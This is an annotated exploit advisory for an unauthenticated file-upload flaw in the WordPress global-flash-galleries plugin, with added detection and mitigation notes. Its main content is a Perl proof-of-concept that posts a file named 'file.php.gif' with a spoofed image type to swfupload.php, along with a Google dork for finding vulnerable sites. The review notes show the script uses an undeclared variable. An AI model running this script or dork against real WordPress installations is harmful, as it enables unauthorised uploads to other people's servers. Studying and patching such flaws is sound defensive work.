###############################################################
# Exploit Title: WordPress global-flash-galleries Plugin Remote File Upload Vulnerability
# Author: Ashiyane Digital Security Team
# Date: 01/18/2014
# Vendor Homepage: http://wordpress.org
# Software Link : http://downloads.wordpress.org/plugin/global-flash-galleries.zip
# Google dork: inurl:/wp-content/plugins/global-flash-galleries/
# Tested on: Windows/Linux
###############################################################
#
# Description :
# Global-Flash Galleries allows unauthenticated users to upload files.
# The filters in place only permit uploads of image files (extensions
# .gif, .png and .jpg). This avoids script-execution problems, but an
# attacker could still use the affected system to host files.
# The vulnerability is caused by inappropriate cookie validation in:
#   /global-flash-galleries/swfupload.php
#
# NOTE(review): this advisory names no affected or fixed plugin version.
# Treat any installation that exposes swfupload.php as affected until the
# plugin's own changelog says otherwise.
#
# Defender notes (general hardening, not specific to a plugin release):
#   * Detection: look in web-server access logs for POST requests to
#     /wp-content/plugins/global-flash-galleries/swfupload.php that are not
#     tied to a logged-in WordPress session, and for newly created gallery
#     files whose names carry more than one extension (e.g. "*.php.gif").
#   * Mitigation: update or remove the plugin, or block direct access to
#     swfupload.php; require a valid authenticated session server-side
#     before accepting an upload; make sure the upload directory cannot
#     execute scripts and that the web server picks a handler from the final
#     file extension only.
#
# Exploit :
# = = = = = = = = =
#
# [Perl]
#! /usr/bin/perl
# Proof-of-concept client: sends one multipart/form-data POST carrying a
# local file to the URL given on the command line, then prints the response
# body on success or the HTTP status line on failure.
# NOTE(review): the listing has no "use strict; use warnings;", and $name
# below is never declared or assigned anywhere in it.
use LWP;
use HTTP::Request::Common;

# Usage: <script> <url-of-swfupload.php> <local-file>
my ($url, $file) = @ARGV;

my $ua = LWP::UserAgent->new();

# No cookie or other credential is attached to the request; per the
# description above, the endpoint accepts the upload anyway.
my $req = POST $url,
    Content_Type => 'form-data',
    Content      => [
        name          => $name,
        galleryselect => 1,    # Gallery ID (popup.php)
        # HTTP::Request::Common file-part form:
        #   [ local path, filename sent to the server, part headers... ]
        # Both the filename ("file.php.gif") and the declared type
        # (image/gif) are chosen by the client and say nothing about the
        # real content. The name ends in .gif, one of the extensions the
        # description lists as permitted by the filter.
        Filedata      => [ "$file", "file.php.gif", Content_Type => 'image/gif' ]
    ];

my $res = $ua->request( $req );

# Any 2xx response counts as success here; the script does not check whether
# the file was actually stored.
if( $res->is_success ) {
    print $res->content;
} else {
    print $res->status_line, "\n";
}
# [Perl]
#
# Exploit demo :
# = = = = = = = = =
# NOTE(review): the original listing named five third-party sites here; the
# hostnames are omitted. Each entry pointed at the same plugin endpoint:
#   http://<wordpress-host>/wp-content/plugins/global-flash-galleries/swfupload.php
#
# #### #### #### #### #### #### #### #### #
# BY T3rm!nat0r5
# Special Tnx to V1R4N64R ,C4T,HAMIDx9
# E-mail : poya.terminator@gmail.com
# #### #### #### #### #### #### #### #### #